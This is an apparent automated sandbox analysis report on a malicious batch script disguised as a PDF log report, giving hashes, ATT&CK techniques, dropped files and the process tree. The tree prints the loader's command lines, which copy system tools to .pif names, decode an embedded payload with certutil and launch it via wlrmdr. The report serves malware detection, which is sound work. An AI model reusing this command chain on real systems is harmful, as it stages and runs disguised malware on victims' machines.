9b4b49505a77593a84b8e160f43134d76e63a7b0e8ad26619d3a60f6cf51ad0d

General

Target

MF-HF malfunction LOG Report,PDF.cmd
Size

2.7MB
MD5

52c4a6ab8615c5f10087756a5506a81d
SHA1

4edc7261d4b1f624d94099071e5752fbc5864fae
SHA256

b7aa6671b0d47e966e51c97c069edff139d312e7707ffbc22fb2392b3004021a
SHA512

b542b3b361dac98ac1db9517aeac1bfec3dab4f3439729f466a225550e1c0b486bf662989bc15f51d25842fedca09087105bd81a48a13a9632f0167375ce39ef
SSDEEP

24576:ybei0ej3l3KRE+5WyHCN51BPTjF0Sj2dkucbo0063u9wN6UFfbDXRCDy:ybeiJjERE+q51SdvmYUz

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 5 IoCs

pid	Process
1580	alpha.pif
536	phf.pif
2736	alpha.pif
2876	phf.pif
2612	awpha.pif

Loads dropped DLL 5 IoCs

pid	Process
2688	cmd.exe
1580	alpha.pif
2688	cmd.exe
2736	alpha.pif
2688	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2628	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2628	PING.EXE

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2612	awpha.pif
2612	awpha.pif
2612	awpha.pif
2612	awpha.pif

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
2612	awpha.pif
2612	awpha.pif
2612	awpha.pif
2612	awpha.pif

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2688 wrote to memory of 2324	2688	cmd.exe	32
PID 2688 wrote to memory of 2324	2688	cmd.exe	32
PID 2688 wrote to memory of 2324	2688	cmd.exe	32
PID 2688 wrote to memory of 2284	2688	cmd.exe	33
PID 2688 wrote to memory of 2284	2688	cmd.exe	33
PID 2688 wrote to memory of 2284	2688	cmd.exe	33
PID 2688 wrote to memory of 3048	2688	cmd.exe	34
PID 2688 wrote to memory of 3048	2688	cmd.exe	34
PID 2688 wrote to memory of 3048	2688	cmd.exe	34
PID 2688 wrote to memory of 1580	2688	cmd.exe	35
PID 2688 wrote to memory of 1580	2688	cmd.exe	35
PID 2688 wrote to memory of 1580	2688	cmd.exe	35
PID 1580 wrote to memory of 536	1580	alpha.pif	36
PID 1580 wrote to memory of 536	1580	alpha.pif	36
PID 1580 wrote to memory of 536	1580	alpha.pif	36
PID 2688 wrote to memory of 2736	2688	cmd.exe	37
PID 2688 wrote to memory of 2736	2688	cmd.exe	37
PID 2688 wrote to memory of 2736	2688	cmd.exe	37
PID 2736 wrote to memory of 2876	2736	alpha.pif	38
PID 2736 wrote to memory of 2876	2736	alpha.pif	38
PID 2736 wrote to memory of 2876	2736	alpha.pif	38
PID 2688 wrote to memory of 2612	2688	cmd.exe	39
PID 2688 wrote to memory of 2612	2688	cmd.exe	39
PID 2688 wrote to memory of 2612	2688	cmd.exe	39
PID 2688 wrote to memory of 2628	2688	cmd.exe	40
PID 2688 wrote to memory of 2628	2688	cmd.exe	40
PID 2688 wrote to memory of 2628	2688	cmd.exe	40

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2688
- C:\Windows\system32\extrac32.exe
  extrac32.exe /C /Y "C:\\Windows\\System32\\wlrmdr.exe" "C:\\Users\\Public\\awpha.pif"
  2⤵
  PID:2324
- C:\Windows\system32\extrac32.exe
  extrac32.exe /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"
  2⤵
  PID:2284
- C:\Windows\system32\extrac32.exe
  extrac32 /C /Y "C:\\Windows\\System32\\certutil.exe" "C:\\Users\\Public\\phf.pif"
  2⤵
  PID:3048
- C:\Users\Public\alpha.pif
  C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1580
- - C:\Users\Public\phf.pif
    C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
    3⤵
    - Executes dropped EXE
    PID:536
- C:\Users\Public\alpha.pif
  C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Users\Public\phf.pif
    C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
    3⤵
    - Executes dropped EXE
    PID:2876
- C:\Users\Public\awpha.pif
  "C:\Users\Public\awpha.pif" -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\Libraries\AnyDesk.pif
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2612
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 5
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\AnyDesk.avi

Filesize
1.9MB

MD5
1681b40bf17bbaa119bc15de0178a7f0

SHA1
4aa764f20cfbcad18a2fd2d6233e80ad6ad8a341

SHA256
d61ec9e10804abaf84e4c59f3a9369f27fd25ba6e60ed293dfc82581b2553cda

SHA512
6b73ce5d844bfbc9caffc55c3412ed0b87e046c3833b000b14fed7e8b2fa3a6fe951b6d63a5080de65f5d69ad60b8a4d254542ad83233f2bb4ed1471fb6e49f6

Download Submit
C:\Users\Public\awpha.pif

Filesize
43KB

MD5
1b79536d9033da4ee3b8b21354dbd391

SHA1
09b4a38f0a6960768f26ef86a30bc0167e690f50

SHA256
385b4553cbef207d9c5e466002940c205d51b1e2095fa8b442de1f64d6512f95

SHA512
2475b0352929d87090d92d1d6b2cb3db97632d780bf898c1c44f9169d513752f1ef26df476f9eb8487e75cbdc5c5584e3a4470cfedcea709a39cd82a59c190ae

Download Submit
C:\Users\Public\phf.pif

Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
\Users\Public\alpha.pif

Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit

Analysis

Sharing